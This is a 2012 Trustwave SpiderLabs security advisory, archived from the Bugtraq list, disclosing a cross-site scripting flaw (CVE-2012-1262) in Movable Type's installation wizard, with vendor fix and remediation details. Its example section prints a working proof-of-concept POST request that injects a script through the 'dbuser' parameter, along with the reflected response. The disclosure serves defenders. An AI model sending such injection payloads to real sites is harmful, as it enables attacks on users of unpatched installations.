lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 24 Feb 2012 16:34:33 -0600
From: Trustwave Advisories <TrustwaveAdvisories@...stwave.com>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: TWSL2012-003: Cross-Site Scripting Vulnerability in Movable Type
 Publishing Platform

Trustwave's SpiderLabs Security Advisory TWSL2012-003:
Cross-Site Scripting Vulnerability in Movable Type Publishing Platform

https://www.trustwave.com/spiderlabs/advisories/TWSL2012-003.txt

Published: 2012-02-24
Version: 1.0

Vendor: Six Apart (http://movabletype.org/)
Product: Movable Type
Version affected: Versions prior to 5.13, 5.07, and 4.38

Product description:
Movable Type is a weblog publishing system developed by the company Six
Apart. The software supports static page generation and includes
functionality, such as managing files, user roles, templates, tags,
categories, and trackback links.


Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Cross-Site Scripting Vulnerability
CVE: CVE-2012-1262

After extracting the Moveable Type CGI files and source files on to a web
server, but before the application is fully installed, cross-site scripting
vulnerabilities are present in the '/cgi-bin/mt/mt-wizard.cgi' page.

Example(s):

Performing XSS on "dbuser" parameter

#Request

POST /cgi-bin/mt/mt-wizard.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/cgi-bin/mt/mt-wizard.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 216

__mode=test&step=configure&set_static_uri_to=&default_language=en-us&config=&dbtype=mysql&dbserver=localhost&dbname=&dbuser=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&dbpass=test&dbpath=&dbport=&dbsocket=&test=1

#Response

<--------------snip----------->
<p>Connection error: Access denied for user '<script>alert('123')</script>'@...calhost' (using password: YES) at /var/www/cgi-bin/mt/extlib/Data/ObjectDriver/Driver/BaseCache.pm line 320
<--------------snip----------->


Vendor Response: These issues have been addressed as of versions 5.13, 5.07, and 4.38.


Remediation Steps: Customers should update to the latest version of Movable
publishing platform in order to address these issues. The above issues have
been corrected in versions 5.13, 5.07, and 4.38.


Revision History:
01/11/12 - Vulnerability disclosed
02/21/12 - Patch released
02/24/12 - Advisory published

References
1. http://www.movabletype.org/2012/02/movable_type_513_507_and_438_security_updates.html


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.

Powered by blists - more mailing lists